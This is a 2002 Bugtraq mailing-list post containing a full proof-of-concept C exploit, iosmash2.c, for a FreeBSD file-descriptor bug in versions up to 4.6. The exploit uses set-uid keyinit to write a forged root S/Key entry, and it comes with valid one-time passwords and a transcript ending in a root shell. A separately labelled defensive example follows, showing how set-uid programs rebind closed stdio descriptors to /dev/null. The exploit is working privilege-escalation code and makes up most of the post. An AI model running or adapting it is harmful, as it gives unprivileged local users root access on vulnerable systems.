Freebsd FD exploit


Date: Sun, 18 Aug 2002 21:01:13 -0400
From: dvdman <dvdman@l33tsecurity.com>
To: bugtraq@lists.securityfocus.com
Subject: Freebsd FD exploit

/* Proof Of Concept exploit for the FreeBSD file descriptors bug. FreeBSD
thought they fixed this months ago; well, guess again :P Thanks to the
FreeBSD kernel you may now enjoy local root on all FreeBSD <= 4.6 ;) */



Attachment: iosmash2.c
/* Proof Of Concept exploit for the FreeBSD file descriptors bug. FreeBSD
   thought they fixed this months ago; well, guess again :P Thanks to the
   FreeBSD kernel you may now enjoy local root on all FreeBSD <= 4.6 ;) */

/* *I AM FREE* *I AM FREE**I AM FREE**I AM FREE**I AM FREE**I AM FREE**I AM FREE**I AM FREE**I AM FREE**I AM FREE**I AM FREE**I AM FREE**I AM FREE**I AM FREE**I AM FREE**I AM FREE**I AM FREE**I AM FREE**I AM FREE**I AM FREE* */

/*
DVDMAN(DVDMAN@L33TSECURITY.COM)
Visit Us: irc.efnet.org #l33tsecurity
www.l33tsecurity.com

And FreeBSD thought they fixed this :P

GREETS:
thanks phased for skeys from iosmash.c :)
thanks all of #l33tsecurity for support
thanks Georgi Guninski for ideas

Details:
Several months ago Joost Pol <joost@pine.nl> made public almost the same
problem. FreeBSD fixed it, but the patch does not cover all the cases. In
some cases the kernel closes fds 0..2 after they are assigned to /dev/null,
leaving the system open to an attack. If a +s file is execed and fds 0..2
are opened to /proc/curproc/{special}, then the kernel forcefully closes
them and open() then reuses them.

This program makes the following S/Key one-time passwords valid:

  95: CARE LIVE CARD LOFT CHIC HILL
  96: TESS OIL WELD DUD MUTE KIT
  97: DADE BED DRY JAW GRAB NOV
  98: MASS OAT ROLL TOOL AGO CAM
  99: DARK LEW JOLT JIVE MOS WHO

PROOF:
[dvdman@xxxx:~]$ uname -a
FreeBSD xxx.xx 4.6-STABLE FreeBSD 4.6-STABLE #1: Sat Jul 27 20:16:20 GMT 2002     dvdman@xxxx:/usr/obj/usr/src/sys/xxx  i386
[dvdman@xxxx:~]$ gcc iosmash2.c
[dvdman@xxxx:~]$ ./a.out
Adding dvdman:
ctrl-c
[dvdman@xxxx:~]$ su
s/key 98 snosoft2
Password:
[root@xxxx:/home/dvdman]#

*/

#include <unistd.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <errno.h>

int main(int argc, char *argv[])
{
	int f;
	int ret;

	/* Fill the descriptor table with copies of stdout, so the only free
	   slots are the ones freed deliberately below. */
	while (dup(1) != -1)
		;
	/* Free fds 2 and 3; the next open() gets the lowest free slot, fd 2. */
	close(2);
	close(3);
	/* fd 2 (stderr) now refers to /proc/curproc/mem, one of the /proc
	   "special" files that makes the kernel close the descriptor when a
	   set-uid image is exec'd (see Details above). */
	f = open("/proc/curproc/mem", O_WRONLY);
	if (f == -1)
		fprintf(stdout, "Error in open /proc\n");
	fprintf(stdout, "press ctrl-c when adding...");
	fflush(stdout);	/* buffered stdio output would otherwise be lost across exec */
	/* argv[0] is the forged /etc/skeykeys line for root. After the kernel
	   closes fd 2, keyinit's first open() reuses it, so what keyinit writes
	   to stderr (its prompts, prefixed with argv[0]) lands in the key file. */
	ret = execl("/usr/bin/keyinit",
	    "\nroot 0099 snosoft2    6f648e8bd0e2988a Apr 23,2666 01:02:03\n",
	    (char *)0);
	if (ret == -1)
		fprintf(stdout, "execl() failed: %s (%d)\n", strerror(errno), errno);
	return 1;
}
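Added example, not part of dvdman's post and not FreeBSD's own (kernel-side) fix: the check a set-uid program can perform for itself, immediately after exec and before its first open(), so that a closed fd 0..2 is rebound to /dev/null instead of being handed to whatever file the program opens first. This is the userland counterpart of the kernel check the exploit above relies on being incomplete; because the post describes the kernel closing the descriptors at exec time, the check has to run inside the privileged program, not in the parent. Function names (fd_is_open, ensure_fd_open, sanitize_std_fds) are mine; main() simulates the condition by closing stderr before the check.

```c
/* Added example: rebind closed stdio descriptors to /dev/null before a
 * privileged program opens anything. Not code from the original post. */
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>

/* Returns 1 if fd refers to an open descriptor, 0 if it is closed.
 * fcntl(F_GETFD) fails with EBADF only for a closed descriptor. */
static int fd_is_open(int fd)
{
	return fcntl(fd, F_GETFD) != -1 || errno != EBADF;
}

/* Ensure fd is open, binding it to /dev/null if it was closed.
 * Returns 1 if it had to be opened, 0 if it was already open, -1 on error. */
static int ensure_fd_open(int fd)
{
	int nullfd;

	if (fd_is_open(fd))
		return 0;
	nullfd = open("/dev/null", fd == STDIN_FILENO ? O_RDONLY : O_WRONLY);
	if (nullfd == -1)
		return -1;
	if (nullfd != fd) {
		/* open() handed out a lower free slot; move it onto fd. */
		if (dup2(nullfd, fd) == -1) {
			close(nullfd);
			return -1;
		}
		close(nullfd);
	}
	return 1;
}

/* Sanitize fds 0, 1, 2 in ascending order, so that filling fd 0 can never
 * consume slot 1 or 2. Returns how many descriptors had to be rebound,
 * or -1 if /dev/null could not be opened. */
static int sanitize_std_fds(void)
{
	int fd, r, fixed = 0;

	for (fd = 0; fd <= 2; fd++) {
		r = ensure_fd_open(fd);
		if (r < 0)
			return -1;
		fixed += r;
	}
	return fixed;
}

int main(void)
{
	int fixed, f;

	/* Simulate the attacker's setup: stderr is closed when we start. */
	close(STDERR_FILENO);

	/* A set-uid program would call this before touching any file. */
	fixed = sanitize_std_fds();
	printf("sanitized: %d stdio descriptor(s) rebound to /dev/null\n", fixed);

	/* With 0..2 all occupied, the first real open() gets fd 3 or higher,
	 * so nothing written to stderr can end up in that file. */
	f = open("/dev/null", O_RDONLY);
	printf("first open() after sanitizing returned fd %d\n", f);
	close(f);
	return 0;
}
```

The ascending order and the dup2() step are the two details that matter: opening /dev/null with fd 1 already closed would otherwise return 1 while the code is trying to repair fd 0, and a descriptor must land on exactly the slot being repaired, not merely on some free slot.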
